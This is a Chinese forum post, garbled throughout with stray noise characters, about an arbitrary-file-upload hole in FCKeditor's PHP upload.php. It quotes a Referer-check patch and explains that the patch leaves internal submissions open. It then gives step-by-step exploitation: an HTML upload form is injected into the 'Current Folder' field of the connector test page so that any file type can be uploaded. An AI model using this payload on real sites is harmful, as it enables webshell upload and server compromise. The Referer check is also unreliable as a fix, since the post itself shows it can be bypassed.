漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
! z: S; u+ q% ]网上给出的修复方案是
5 b/ g- A6 D* [4 N& h ^修复方法,删除FCK编辑器用其他的编辑器5 b7 {. w) u9 ^$ B2 O
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
5 L6 C/ m$ n5 l9 p在
# r% B2 {* K7 I" y# Y7 ?' Brequire(‘config.php’);: R' m% k7 }7 J3 |* S
require(‘util.php’);/ h# u& W. u- p. k/ h
的下面添加以下代码—————————–# j- I# o H. \
//防止外部提交5 _/ U( Y" D" K
function outsidepost()
, q: R! T9 }% l% s2 C; T" I8 x{$ ^1 X/ L& }1 M
$servername=$_SERVER['SERVER_NAME'];8 t! T d! y4 O
$sub_from=@$_SERVER['HTTP_REFERER'];" ^1 n- A$ |* Z3 G$ u9 G! D
$sub_len=strlen($servername);
; m6 P5 S6 O: T8 u" S/ I$ ~3 i* o. R$checkfrom=substr($sub_from,7,$sub_len);! {& x8 J0 P4 d/ k
if($checkfrom!=$servername){
. H" J' ~* y* Z& b& t, Gecho(“you don’t outsidepost!”);
J( w. u, K" n6 m/ Y, wexit;
2 {, [ V& x- t6 \6 ?}
' s$ K( z/ D6 L. X}8 a: P. l) J2 k) L
outsidepost(); F q) a% J' d' j ~9 s
防止外部提交,但是没有防止内部提交,+ o9 R, z5 b/ u$ M6 F7 A _
利用方法:
0 y& n& x7 f! R( N1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
, ?+ B8 H: p; o/ A/ I2,在Current Folder 框输入
* E h9 U! s4 H) m5 c<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
) p# C, V6 l) B2 T然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
6 E- k4 m$ y2 U+ @9 S$ I7 jPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对